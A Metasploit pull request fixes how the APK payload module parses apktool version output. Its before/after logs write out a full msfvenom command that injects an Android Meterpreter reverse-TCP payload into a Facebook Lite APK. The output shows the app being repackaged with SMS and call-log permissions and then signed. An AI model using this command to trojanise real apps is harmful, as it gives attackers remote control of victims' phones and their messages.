### PR TITLE
Msf::Payload::Apk: Fix apktool version check

### DIFF
--- a/lib/msf/core/payload/apk.rb
+++ b/lib/msf/core/payload/apk.rb
@@ -146,11 +146,11 @@ class Msf::Payload::Apk
     end
 
     apktool = run_cmd(%w[apktool -version])
-    unless apktool != nil
+    if apktool.nil?
       raise RuntimeError, "apktool not found. If it's not in your PATH, please add it."
     end
 
-    apk_v = Rex::Version.new(apktool)
+    apk_v = Rex::Version.new(apktool.split("\n").first.strip)
     unless apk_v >= Rex::Version.new('2.0.1')
       raise RuntimeError, "apktool version #{apk_v} not supported, please download at least version 2.0.1."
     end


### PR DESCRIPTION
In some configurations (likely related to system environment), the output from `apktool -version` was as follows:

```
"2.6.0\nPicked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true\n"
```

This is due to `run_cmd` returning `stderr` appended to `stdout`:

https://github.com/rapid7/metasploit-framework/blob/f3228b4af7cfa4046313f86673f00096abb7f3ef/lib/msf/core/payload/apk.rb#L28-L35

This causes issues when `stderr` contains verbose output and/or error messages, as the entire string was parsed directly to `Rex::Version` which fails as the string is not a valid version string, resulting in incorrect errors in instances where `msfvenom` should have worked fine.

https://github.com/rapid7/metasploit-framework/blob/f3228b4af7cfa4046313f86673f00096abb7f3ef/lib/msf/core/payload/apk.rb#L148-L156

Also, the `Error: Malformed version number string 2.6.0` error message is not helpful and only leads to confusion.

Previous advice to resolve this issue was to update `apktool`. This is incorrect. The latest version of apktool (2.6.0) still exhibits this behaviour. This is a bug in Metasploit not `apktool`.

* Fixes #15663
* Fixes #13520
* Fixes #13454
* Fixes #13231
* Fixes #12648
* Fixes #12139
* Fixes https://github.com/rapid7/metasploit-framework/issues/11024#issuecomment-632034242
* ... probably others

# Before

```
# ./msfvenom -x facebook_lite_v291.0.0.12.110.apk -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=1337 -o asdf.apk
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
Using APK template: facebook_lite_v291.0.0.12.110.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: Malformed version number string 2.6.0
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
```

# After

```
# ./msfvenom -x facebook_lite_v291.0.0.12.110.apk -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=1337 -o asdf.apk
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
Using APK template: facebook_lite_v291.0.0.12.110.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.facebook.lite.umger
[*] Loading /tmp/d20220227-367035-4gvewx/original/smali/com/facebook/lite/ClientApplicationSplittedShell.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20220227-367035-4gvewx/output.apk
[*] Signing /tmp/d20220227-367035-4gvewx/output.apk
[*] Aligning /tmp/d20220227-367035-4gvewx/output.apk
Payload size: 1990142 bytes
Saved as: asdf.apk
# file asdf.apk 
asdf.apk: Zip archive data, at least v2.0 to extract, compression method=deflate
```
